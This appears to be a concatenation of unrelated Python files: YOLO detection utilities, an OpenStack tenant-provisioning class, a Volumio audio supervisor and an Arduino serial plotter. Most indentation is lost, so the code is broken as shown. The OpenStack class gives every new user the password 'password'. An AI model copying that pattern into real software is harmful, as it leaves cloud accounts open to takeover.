print("while using custom classes, if using custom model in configs.py set YOLO_CUSTOM_WEIGHTS = True")
# get text size
(text_width, text_height), baseline = cv2.getTextSize(label, cv2.FONT_HERSHEY_COMPLEX_SMALL,
fontScale, thickness=bbox_thick)
# put filled text rectangle
cv2.rectangle(image, (x1, y1), (x1 + text_width, y1 - text_height - baseline), bbox_color, thickness=cv2.FILLED)
# put text above rectangle
cv2.putText(image, label, (x1, y1-4), cv2.FONT_HERSHEY_COMPLEX_SMALL,
fontScale, Text_colors, bbox_thick, lineType=cv2.LINE_AA)
return image
def bboxes_iou(boxes1, boxes2):
boxes1 = np.array(boxes1)
boxes2 = np.array(boxes2)
boxes1_area = (boxes1[..., 2] - boxes1[..., 0]) * (boxes1[..., 3] - boxes1[..., 1])
boxes2_area = (boxes2[..., 2] - boxes2[..., 0]) * (boxes2[..., 3] - boxes2[..., 1])
left_up = np.maximum(boxes1[..., :2], boxes2[..., :2])
right_down = np.minimum(boxes1[..., 2:], boxes2[..., 2:])
inter_section = np.maximum(right_down - left_up, 0.0)
inter_area = inter_section[..., 0] * inter_section[..., 1]
union_area = boxes1_area + boxes2_area - inter_area
ious = np.maximum(1.0 * inter_area / union_area, np.finfo(np.float32).eps)
return ious
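# Tiny illustrative check (numbers invented) of the [xmin, ymin, xmax, ymax] box format
# expected by bboxes_iou(): two 10x10 boxes overlapping on a 5x5 patch give
# IoU = 25 / (100 + 100 - 25) ~= 0.143.
def _example_bboxes_iou():
    box_a = np.array([0, 0, 10, 10], dtype=np.float32)
    box_b = np.array([5, 5, 15, 15], dtype=np.float32)
    iou = bboxes_iou(box_a, box_b)
    assert abs(iou - 25.0 / 175.0) < 1e-6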
def nms(bboxes, iou_threshold, sigma=0.3, method='nms'):
"""
:param bboxes: (xmin, ymin, xmax, ymax, score, class)
Note: soft-nms, https://arxiv.org/pdf/1704.04503.pdf
https://github.com/bharatsingh430/soft-nms
"""
classes_in_img = list(set(bboxes[:, 5]))
best_bboxes = []
for cls in classes_in_img:
cls_mask = (bboxes[:, 5] == cls)
cls_bboxes = bboxes[cls_mask]
# Process 1: Determine whether the number of bounding boxes is greater than 0
while len(cls_bboxes) > 0:
# Process 2: Select the bounding box A with the highest score
max_ind = np.argmax(cls_bboxes[:, 4])
best_bbox = cls_bboxes[max_ind]
best_bboxes.append(best_bbox)
cls_bboxes = np.concatenate([cls_bboxes[: max_ind], cls_bboxes[max_ind + 1:]])
# Process 3: Calculate the IoU between bounding box A and all remaining boxes,
# and remove those boxes whose IoU is higher than the threshold
iou = bboxes_iou(best_bbox[np.newaxis, :4], cls_bboxes[:, :4])
weight = np.ones((len(iou),), dtype=np.float32)
assert method in ['nms', 'soft-nms']
if method == 'nms':
iou_mask = iou > iou_threshold
weight[iou_mask] = 0.0
if method == 'soft-nms':
weight = np.exp(-(1.0 * iou ** 2 / sigma))
cls_bboxes[:, 4] = cls_bboxes[:, 4] * weight
score_mask = cls_bboxes[:, 4] > 0.
cls_bboxes = cls_bboxes[score_mask]
return best_bboxes
def postprocess_boxes(pred_bbox, original_image, input_size, score_threshold):
valid_scale=[0, np.inf]
pred_bbox = np.array(pred_bbox)
pred_xywh = pred_bbox[:, 0:4]
pred_conf = pred_bbox[:, 4]
pred_prob = pred_bbox[:, 5:]
# 1. (x, y, w, h) --> (xmin, ymin, xmax, ymax)
pred_coor = np.concatenate([pred_xywh[:, :2] - pred_xywh[:, 2:] * 0.5,
pred_xywh[:, :2] + pred_xywh[:, 2:] * 0.5], axis=-1)
# 2. (xmin, ymin, xmax, ymax) -> (xmin_org, ymin_org, xmax_org, ymax_org)
org_h, org_w = original_image.shape[:2]
resize_ratio = min(input_size / org_w, input_size / org_h)
dw = (input_size - resize_ratio * org_w) / 2
dh = (input_size - resize_ratio * org_h) / 2
pred_coor[:, 0::2] = 1.0 * (pred_coor[:, 0::2] - dw) / resize_ratio
pred_coor[:, 1::2] = 1.0 * (pred_coor[:, 1::2] - dh) / resize_ratio
# 3. clip some boxes those are out of range
pred_coor = np.concatenate([np.maximum(pred_coor[:, :2], [0, 0]),
np.minimum(pred_coor[:, 2:], [org_w - 1, org_h - 1])], axis=-1)
invalid_mask = np.logical_or((pred_coor[:, 0] > pred_coor[:, 2]), (pred_coor[:, 1] > pred_coor[:, 3]))
pred_coor[invalid_mask] = 0
# 4. discard some invalid boxes
bboxes_scale = np.sqrt(np.multiply.reduce(pred_coor[:, 2:4] - pred_coor[:, 0:2], axis=-1))
scale_mask = np.logical_and((valid_scale[0] < bboxes_scale), (bboxes_scale < valid_scale[1]))
# 5. discard boxes with low scores
classes = np.argmax(pred_prob, axis=-1)
scores = pred_conf * pred_prob[np.arange(len(pred_coor)), classes]
score_mask = scores > score_threshold
mask = np.logical_and(scale_mask, score_mask)
coors, scores, classes = pred_coor[mask], scores[mask], classes[mask]
return np.concatenate([coors, scores[:, np.newaxis], classes[:, np.newaxis]], axis=-1)
def detect_image(Yolo, image_path, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
original_image = cv2.imread(image_path)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
image_data = image_preprocess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
image = draw_bbox(original_image, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
# CreateXMLfile("XML_Detections", str(int(time.time())), original_image, bboxes, read_class_names(CLASSES))
if output_path != '': cv2.imwrite(output_path, image)
if show:
# Show the image
cv2.imshow("predicted image", image)
# Load and hold the image
cv2.waitKey(0)
# Close the window once a key has been pressed
cv2.destroyAllWindows()
return image
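# Hedged usage sketch (the image paths are placeholders and a configured model/weights
# setup is assumed): load a model once with Load_Yolo_model() and run detect_image() on a file.
def _example_detect_image():
    yolo = Load_Yolo_model()
    detect_image(yolo, "IMAGES/street.jpg", "IMAGES/street_pred.jpg",
                 input_size=YOLO_INPUT_SIZE, show=False,
                 score_threshold=0.3, iou_threshold=0.45)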
def Predict_bbox_mp(Frames_data, Predicted_data, Processing_times):
gpus = tf.config.experimental.list_physical_devices('GPU')
if len(gpus) > 0:
try: tf.config.experimental.set_memory_growth(gpus[0], True)
except RuntimeError: print("RuntimeError in tf.config.experimental.list_physical_devices('GPU')")
Yolo = Load_Yolo_model()
times = []
while True:
if Frames_data.qsize()>0:
image_data = Frames_data.get()
t1 = time.time()
Processing_times.put(time.time())
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
Predicted_data.put(pred_bbox)
def postprocess_mp(Predicted_data, original_frames, Processed_frames, Processing_times, input_size, CLASSES, score_threshold, iou_threshold, rectangle_colors, realtime):
times = []
while True:
if Predicted_data.qsize()>0:
pred_bbox = Predicted_data.get()
if realtime:
while original_frames.qsize() > 1:
original_image = original_frames.get()
else:
original_image = original_frames.get()
bboxes = postprocess_boxes(pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
image = draw_bbox(original_image, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
times.append(time.time()-Processing_times.get())
times = times[-20:]
ms = sum(times)/len(times)*1000
fps = 1000 / ms
image = cv2.putText(image, "Time: {:.1f}FPS".format(fps), (0, 30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
#print("Time: {:.2f}ms, Final FPS: {:.1f}".format(ms, fps))
Processed_frames.put(image)
def Show_Image_mp(Processed_frames, show, Final_frames):
while True:
if Processed_frames.qsize()>0:
image = Processed_frames.get()
Final_frames.put(image)
if show:
cv2.imshow('output', image)
if cv2.waitKey(25) & 0xFF == ord("q"):
cv2.destroyAllWindows()
break
# detect from webcam
def detect_video_realtime_mp(video_path, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors='', realtime=False):
if realtime:
vid = cv2.VideoCapture(0)
else:
vid = cv2.VideoCapture(video_path)
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(output_path, codec, fps, (width, height)) # output_path must be .mp4
no_of_frames = int(vid.get(cv2.CAP_PROP_FRAME_COUNT))
original_frames = Queue()
Frames_data = Queue()
Predicted_data = Queue()
Processed_frames = Queue()
Processing_times = Queue()
Final_frames = Queue()
p1 = Process(target=Predict_bbox_mp, args=(Frames_data, Predicted_data, Processing_times))
p2 = Process(target=postprocess_mp, args=(Predicted_data, original_frames, Processed_frames, Processing_times, input_size, CLASSES, score_threshold, iou_threshold, rectangle_colors, realtime))
p3 = Process(target=Show_Image_mp, args=(Processed_frames, show, Final_frames))
p1.start()
p2.start()
p3.start()
while True:
ret, img = vid.read()
if not ret:
break
original_image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
original_frames.put(original_image)
image_data = image_preprocess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
Frames_data.put(image_data)
while True:
if original_frames.qsize() == 0 and Frames_data.qsize() == 0 and Predicted_data.qsize() == 0 and Processed_frames.qsize() == 0 and Processing_times.qsize() == 0 and Final_frames.qsize() == 0:
p1.terminate()
p2.terminate()
p3.terminate()
break
elif Final_frames.qsize()>0:
image = Final_frames.get()
if output_path != '': out.write(image)
cv2.destroyAllWindows()
def detect_video(Yolo, video_path, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
times, times_2 = [], []
vid = cv2.VideoCapture(video_path)
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(output_path, codec, fps, (width, height)) # output_path must be .mp4
while True:
_, img = vid.read()
try:
original_image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
except:
break
image_data = image_preprocess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
t1 = time.time()
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
t2 = time.time()
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
image = draw_bbox(original_image, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
t3 = time.time()
times.append(t2-t1)
times_2.append(t3-t1)
times = times[-20:]
times_2 = times_2[-20:]
ms = sum(times)/len(times)*1000
fps = 1000 / ms
fps2 = 1000 / (sum(times_2)/len(times_2)*1000)
image = cv2.putText(image, "Time: {:.1f}FPS".format(fps), (0, 30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
# CreateXMLfile("XML_Detections", str(int(time.time())), original_image, bboxes, read_class_names(CLASSES))
print("Time: {:.2f}ms, Detection FPS: {:.1f}, total FPS: {:.1f}".format(ms, fps, fps2))
if output_path != '': out.write(image)
if show:
cv2.imshow('output', image)
if cv2.waitKey(25) & 0xFF == ord("q"):
cv2.destroyAllWindows()
break
cv2.destroyAllWindows()
# detect from webcam
def detect_realtime(Yolo, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
times = []
vid = cv2.VideoCapture(0)
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(output_path, codec, fps, (width, height)) # output_path must be .mp4
while True:
_, frame = vid.read()
try:
original_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
original_frame = cv2.cvtColor(original_frame, cv2.COLOR_BGR2RGB)
except:
break
image_data = image_preprocess(np.copy(original_frame), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
t1 = time.time()
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
t2 = time.time()
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(pred_bbox, original_frame, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
times.append(t2-t1)
times = times[-20:]
ms = sum(times)/len(times)*1000
fps = 1000 / ms
print("Time: {:.2f}ms, {:.1f} FPS".format(ms, fps))
frame = draw_bbox(original_frame, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
# CreateXMLfile("XML_Detections", str(int(time.time())), original_frame, bboxes, read_class_names(CLASSES))
image = cv2.putText(frame, "Time: {:.1f}FPS".format(fps), (0, 30),
cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
if output_path != '': out.write(frame)
if show:
cv2.imshow('output', frame)
if cv2.waitKey(25) & 0xFF == ord("q"):
cv2.destroyAllWindows()
break
cv2.destroyAllWindows()
|
utils.py
|
import openstack
import functools
from multiprocessing import Process
# openstack.enable_logging(debug=True)
import logging
import logging.handlers
# Logging Parameters
logger = logging.getLogger(__name__)
file_handler = logging.handlers.RotatingFileHandler(
'katana.log', maxBytes=10000, backupCount=5)
stream_handler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s %(name)s %(levelname)s %(message)s')
stream_formatter = logging.Formatter(
'%(asctime)s %(name)s %(levelname)s %(message)s')
file_handler.setFormatter(formatter)
stream_handler.setFormatter(stream_formatter)
logger.setLevel(logging.DEBUG)
logger.addHandler(file_handler)
logger.addHandler(stream_handler)
def timeout(func):
"""
Wrapper for function, terminate after 5 seconds
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
action = Process(target=func, args=args, kwargs=kwargs)
action.start()
action.join(timeout=5)
if action.is_alive():
# terminate function
action.terminate()
# clean up
action.join()
raise TimeoutError
# if the exit code is not 0, the call was not successful
if action.exitcode != 0:
# raise AttributeError, which is the most probable cause
raise AttributeError
return (wrapper)
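# Illustrative example only (the function below is never called here): any function
# decorated with @timeout runs in a separate process and is terminated after 5 seconds,
# raising TimeoutError; a non-zero exit code is surfaced as AttributeError.
@timeout
def _example_slow_call():
    import time
    time.sleep(60)  # calling _example_slow_call() would raise TimeoutError after ~5 s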
class Openstack():
"""
Class implementing the communication API with OpenStack
"""
# Note: Cannot use conn as a self variable, as it is not possible to
# serialize it and store it in a db
def __init__(self, uuid, auth_url, project_name, username, password,
user_domain_name='Default',
project_domain_name='default'):
"""
Initialize an object of the class
"""
self.uuid = uuid
self.auth_url = auth_url
self.project_name = project_name
self.username = username
self.password = password
self.user_domain_name = user_domain_name
self.project_domain_name = project_domain_name
conn = openstack.connect(
auth_url=self.auth_url,
project_name=self.project_name,
username=self.username,
password=self.password,
user_domain_name=self.user_domain_name,
project_domain_name=self.project_domain_name,
)
try:
conn.authorize()
except AttributeError as e:
logger.exception("AttributeError baby")
self.auth_error = True
except Exception as e:
# raise for logging purposes
logger.exception("Something went wrong", e)
self.auth_error = True
else:
self.auth_error = False
@timeout
def openstack_authorize(self, conn):
"""
Authorizes against the OpenStack instance; returns True on error, False on success
"""
try:
_ = conn.authorize()
except AttributeError as e:
logger.exception("AttributeError baby")
return True
except Exception as e:
# raise for logging purposes
logger.exception("Something went wrong", e)
return True
else:
return False
def create_project(self, conn, name, description="Katana Slice Project"):
"""
Creates a new openstack project
"""
project = conn.identity.create_project(name=name,
description=description)
# returns Project object
return project
def create_user(self, conn, name, password="password",
description="Katana Slice User"):
"""
Creates a new openstack user
"""
user = conn.identity.create_user(name=name, password=password,
description=description)
return user
def combine_proj_user(self, conn, project, user):
"""
Combines the newly created project and user
"""
userrole = conn.identity.find_role("user")
heatrole = conn.identity.find_role("heat_stack_owner")
conn.identity.assign_project_role_to_user(project, user, userrole)
conn.identity.assign_project_role_to_user(project, user, heatrole)
# Add admin user to the project, in order to create the MAC Addresses
adminrole = conn.identity.find_role("admin")
admin_user = conn.identity.find_user("admin", ignore_missing=False)
conn.identity.assign_project_role_to_user(project, admin_user,
adminrole)
conn.identity.assign_project_role_to_user(project, admin_user,
heatrole)
def create_sec_group(self, conn, name, project):
"""
Creates the security group to be assigned to the new tenant
"""
sec_group = conn.create_security_group(
name=name, description="Katana Security Group",
project_id=project.id)
conn.create_security_group_rule(sec_group)
return sec_group
def delete_user(self, conn, name):
"""
Deletes the user
"""
user = conn.identity.find_user(name, ignore_missing=False)
conn.identity.delete_user(user, ignore_missing=False)
def delete_project(self, conn, name):
"""
Deletes the project
"""
project = conn.identity.find_project(name, ignore_missing=False)
conn.identity.delete_project(project, ignore_missing=False)
def delete_sec_group(self, conn, name):
"""
Deletes the security group
"""
conn.delete_security_group(name)
def delete_proj_user(self, tenant):
"""
Deletes user and project
"""
conn = openstack.connect(
auth_url=self.auth_url,
project_name=self.project_name,
username=self.username,
password=self.password,
user_domain_name=self.user_domain_name,
project_domain_name=self.project_domain_name,
)
self.openstack_authorize(conn)
user_name = tenant["sliceUserName"]
proj_name = tenant["sliceProjectName"]
# Find Project and User
project = conn.identity.find_project(proj_name, ignore_missing=False)
user = conn.identity.find_user(user_name, ignore_missing=False)
sec_group_list = []
for sec_group in conn.network.security_groups():
if sec_group.project_id == project.id:
sec_group_list.append(sec_group)
try:
conn.identity.delete_user(user, ignore_missing=False)
except openstack.exceptions.ResourceNotFound as e:
logger.exception("Failed. User trying to delete, doesn't exist")
try:
conn.identity.delete_project(project, ignore_missing=False)
except openstack.exceptions.ResourceNotFound as e:
logger.exception("Failed. Project trying to delete, doesn't exist")
for sec_group in sec_group_list:
try:
conn.delete_security_group(sec_group.id)
except openstack.exceptions.ResourceNotFound as e:
logger.exception("Failed. Security group trying to delete, doesn't\
exist", e)
def set_quotas(self, conn, name, **kwargs):
"""
Sets the quotas of the user
"""
try:
conn.set_compute_quotas(
name_or_id=name, **kwargs)
except (openstack.exceptions.BadRequestException, TypeError) as e:
logger.exception(
"Bad set quota request was made. Quotas didn't change: %s", e)
# example of quotas_list
# quotas_list = {'injected_file_content_bytes': 10240, 'metadata_items': 128, 'server_group_members': 10, 'server_groups': 10, 'ram': 51200, 'floating_ips': 13, 'key_pairs': 100,
# 'instances': 18, 'security_group_rules': 20, 'cores': 25, 'fixed_ips': -1, 'injected_file_path_bytes': 255, 'security_groups': 10}
# new_quotas = conn.get_compute_quotas(name_or_id='test3')
# logger.debug(new_quotas)
# return (new_quotas)
def create_slice_prerequisites(self, tenant_project_name,
tenant_project_description,
tenant_project_user,
tenant_project_password,
slice_uuid):
"""
Creates the tenant (project, user, security_group) on the specified VIM
"""
conn = openstack.connect(
auth_url=self.auth_url,
project_name=self.project_name,
username=self.username,
password=self.password,
user_domain_name=self.user_domain_name,
project_domain_name=self.project_domain_name,
)
self.openstack_authorize(conn)
# creates the project in Openstack
project = self.create_project(conn, tenant_project_name,
tenant_project_description)
# creates the user
user = self.create_user(conn, tenant_project_user, "password")
# assigns some needed roles
self.combine_proj_user(conn, project, user)
# creates the security group and rules
sec_group = self.create_sec_group(conn, tenant_project_name, project)
return {"sliceProjectName": project.name, "sliceUserName": user.name,
"secGroupName": sec_group.name}
|
AudioSupervisor.py
|
#!/usr/bin/python
from __future__ import unicode_literals
import json, sys
from socketIO_client import SocketIO
import time
from time import sleep
from threading import Thread
from hardware import *
from modules.logger import *
import RPi.GPIO as GPIO
import os
GPIO.setmode(GPIO.BCM)
# Configs:
t_session_timout = 900 # Seconds before Spotify connect timeout
t_open = datetime.time(07, 00) # CASE LAB time
t_case = datetime.time(17, 00) # CASE Association time
t_clean = datetime.time(23, 30) # Time to lower music and clean
t_closing = datetime.time(23, 59) # Closing time
maxvol_cleaning = 100 # 75
maxvol_lab = 100 # 80 TODO: fix volume bug in volumio setting volume = 100 always
maxvol_case = 100
# Setup control button inputs.
btn_prew = None
btn_pp = None
btn_nxt = None
# GPIO.setup(btn_prew, GPIO.IN, pull_up_down=GPIO.PUD_UP) # Prew
# GPIO.setup(btn_pp, GPIO.IN, pull_up_down=GPIO.PUD_UP) # Play/Pause
# GPIO.setup(btn_nxt, GPIO.IN, pull_up_down=GPIO.PUD_UP) # Next
log = Log(LOGLEVEL.INFO)
volumio_host = 'localhost'
volumio_port = 3000
VOLUME_DT = 5 # volume adjustment step
volumioIO = SocketIO(volumio_host, volumio_port)
class DigitalSoundProcessor:
def __init__(self):
pass
DSP = DigitalSoundProcessor
DSP.activeSong = 'AMPI'
DSP.activeArtist = 'VOLUMIO'
DSP.playState = 'Unknown'
DSP.playPosition = 0
DSP.ptime = 0
DSP.duration = 0
DSP.modal = False
DSP.playlistoptions = []
DSP.queue = []
DSP.libraryFull = []
DSP.libraryNames = []
DSP.volume = 0
DSP.source = None
DSP.closed = False
DSP.t_last_played = datetime.datetime.now()
emit_volume = False
emit_track = False
def onPushState(data):
newStatus = None
if 'trackType' in data:
s = data['trackType']
if s != DSP.source:
log.info("New source: " + str(s))
DSP.source = s
if 'title' in data:
newSong = data['title']
else:
newSong = ''
if newSong is None:
newSong = ''
if 'artist' in data:
newArtist = data['artist']
else:
newArtist = ''
if newArtist is None: # volumio can push NoneType
newArtist = ''
if 'position' in data: # current position in queue
DSP.playPosition = data['position'] # didn't work well with volumio ver. < 2.5
if 'status' in data:
newStatus = data['status']
if 'seek' in data:
DSP.ptime = data['seek']
if 'duration' in data:
DSP.duration = data['duration']
if 'volume' in data:
DSP.volume = data['volume']
if 'disableVolumeControl' in data:
DSP.volumeControlDisabled = data['disableVolumeControl']
if (newSong != DSP.activeSong): # new song
log.info("New Song: " + "\033[94m" + newSong.encode('ascii', 'ignore') + "\033[0m")
DSP.activeSong = newSong
DSP.activeArtist = newArtist
if newStatus != DSP.playState:
DSP.playState = newStatus
def onPushQueue(data):
DSP.queue = [track['name'] if 'name' in track else 'no track' for track in data]
log.info('Queue length is ' + str(len(DSP.queue)))
def onPushBrowseSources(data):
log.info('Browse sources:')
for item in data:
log.blue(item['uri'])
def onPushListPlaylist(data):
global DSP
if len(data) > 0:
DSP.playlistoptions = data
def onNextBtnEvent():
volumioIO.emit('next', '')
def onPPBtnEvent(state='toggle'):
volumioIO.emit(state, '')
def onPrewBtnEveny():
volumioIO.emit('prev', '')
def t_in_range(start, end):
"""
Check if current time is in given range
:param start: start time. datetime.time object
:param end: end time. datetime.time object
:return: True if in range, else False.
"""
now_time = datetime.datetime.now().time()
return start <= now_time <= end
def volume_guard(limit, start, end):
"""
Check if volume percentage is acceptable if current time is in timespan.
:param limit: Volume limit in percentage.
:param start: interval start time. datetime.time object
:param end: interval end time. datetime.time object
:return: True if volume is ok
"""
global emit_volume
if t_in_range(start, end) and DSP.volume > limit:
log.warn('Volume over limit! ({}%), New volume level: {}%'.format(DSP.volume, limit))
DSP.volume = limit
emit_volume = True
return False
return True
def reset_Spotify_connect():
"""
Reset Spotify connect service(volspotconnect2).
Requires root privileges.
:return: True if successful request.
"""
try:
if os.geteuid() != 0:
log.warn("You must run as Root to reset Spotify connect!")
return False
else:
os.system("systemctl restart volspotconnect2") # Restart Spotify Connect client.
log.info("Spotify Connect was reset")
except Exception as err:
log.err("Spotify reset error, ", err)
return False
return True
def is_active_Spotify_connect(timeout=900):
"""
Spotify Connect watchdog.
:param timeout: time in seconds after which inactive session is reset.
:return: returns true if session is active, else false.
"""
t_delta = datetime.datetime.now() - DSP.t_last_played
if DSP.playState == 'play' and DSP.source == 'spotify':
DSP.t_last_played = datetime.datetime.now()
return True
elif DSP.playState == 'stop' and t_delta.seconds >= timeout:
log.info("Inactive Spotify Connect session detected.")
reset_Spotify_connect()
return False
"""
Startup initializer
"""
print('\033[92m \n'
' ___________________________________________________________________________________________________\n'
' /\033[95m ____ _ ____ _____ \033[94m _ _ _ \033[91m ____ _ \033[92m\ \n'
'|\033[95m / ___| / \ / ___|| ____|\033[94m / \ _ _ __| (_) ___ \033[91m / ___| _ _ ___| |_ ___ _ __ ___ \033[92m|\n'
'|\033[95m | | / _ \ \___ \| _| \033[94m / _ \| | | |/ _` | |/ _ \ \033[91m \___ \| | | / __| __/ _ \ _ ` _ \ \033[92m|\n'
'|\033[95m | |___ / ___ \ ___) | |___ \033[94m / ___ \ |_| | (_| | | (_) |\033[91m ___) | |_| \__ \ |_ __/ | | | | | \033[92m|\n'
'|\033[95m \____/_/ \_\____/|_____|\033[94m /_/ \_\__,_|\__,_|_|\___/ \033[91m |____/ \__, |___/\__\___|_| |_| |_| \033[92m|\n'
'| \033[91m |___/\033[90m By Stefan Larsson 2019 \033[92m|\n'
' \___________________________________________________________________________________________________/\033[0m\n')
if os.geteuid() != 0:
log.warn("You must run as Root for Spotify Connect watchdog!")
def _receive_thread():
volumioIO.wait()
# GPIO.add_event_callback(btn_nxt, GPIO.FALLING, callback=onNextBtnEvent(), bouncetime=300)
# GPIO.add_event_callback(btn_pp, GPIO.FALLING, callback=onPPBtnEvent(), bouncetime=300)
# GPIO.add_event_callback(btn_prew, GPIO.FALLING, callback=onPrewBtnEveny(), bouncetime=300)
receive_thread = Thread(target=_receive_thread, name="Receiver")
receive_thread.daemon = True
volumioIO.on('pushState', onPushState)
volumioIO.on('pushQueue', onPushQueue)
volumioIO.on('pushListPlaylist', onPushListPlaylist)
volumioIO.on('pushBrowseSources', onPushBrowseSources)
# get list of Playlists and initial state
volumioIO.emit('listPlaylist')
volumioIO.emit('getState')
#volumioIO.emit('getQueue')
sleep(0.1)
try:
with open('DSPconfig.json', 'r') as f: # load last playing track number
config = json.load(f)
except IOError:
pass
else:
DSP.playPosition = config['track']
receive_thread.start()
# todo Implement: if longpress on p/p -> disconnect current user(restart client)
def main():
global emit_volume, emit_track
while True:
if emit_volume:
emit_volume = False
log.info("Volume: " + str(DSP.volume))
#volumioIO.emit('volume', DSP.volume)
if emit_track:
emit_track = False
try:
log.info('Track selected: ' + str(DSP.playPosition + 1) + '/' + str(len(DSP.queue)) + ' ' + DSP.queue[
DSP.playPosition].encode('ascii', 'ignore'))
except IndexError:
pass
volumioIO.emit('play', {'value': DSP.playPosition})
if t_in_range(t_open, t_closing): # Check if open hours
if is_active_Spotify_connect(timeout=t_session_timout): # If Spotify connection is active.
if DSP.closed:
DSP.closed = False
log.info('Lab is open.')
# Check if music state need change. If weekend, only open hours matters.
if datetime.datetime.today().weekday() not in {5, 6} and \
not volume_guard(maxvol_case, t_case, t_clean) and \
not volume_guard(maxvol_lab, t_open, t_case) and \
not volume_guard(maxvol_cleaning, t_clean, t_closing):
# Audio state has changed
log.info("New Audio State")
else:
# Audio state ok
pass
else: # If Lab is closed
# Stop music
if not DSP.closed and DSP.source == 'spotify':
DSP.closed = True
DSP.volume = 0 # Turn off volume
emit_volume = True
volumioIO.emit('stop') # Stop playing music request
time.sleep(1)
reset_Spotify_connect() # Disconnect Spotify Connection
log.info("Lab closed, opens: {}".format(t_open.strftime('%H:%M')))
time.sleep(10)
def defer():
try:
GPIO.cleanup()
receive_thread.join(1)
log.info("System exit ok")
except Exception as err:
log.err("Defer Error: " + str(err))
if __name__ == '__main__':
try:
main()
except(KeyboardInterrupt, SystemExit):
defer()
|
serialplotter.py
|
import sys # For exception details
import os
import serial # Serial comms
import matplotlib # Graph library
import matplotlib.pyplot as plt # Plotting
matplotlib.use("TkAgg") # Set GUI for matplotlib
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg # matplotlib backend
from matplotlib.figure import Figure
import tkinter as tk # GUI
from tkinter import ttk
import threading # Read serial in another thread so it doesn't block the GUI
import argparse # read serial port property flags
parser = argparse.ArgumentParser(description='Python real-time serial plotter for Arduino')
parser.add_argument('-p','--port_name', default='COM3', help='The name of the serial port, default=COM3')
parser.add_argument('-b','--baud_rate', default=9600, help ='Baud rate, default=9600', type=int)
args = parser.parse_args()
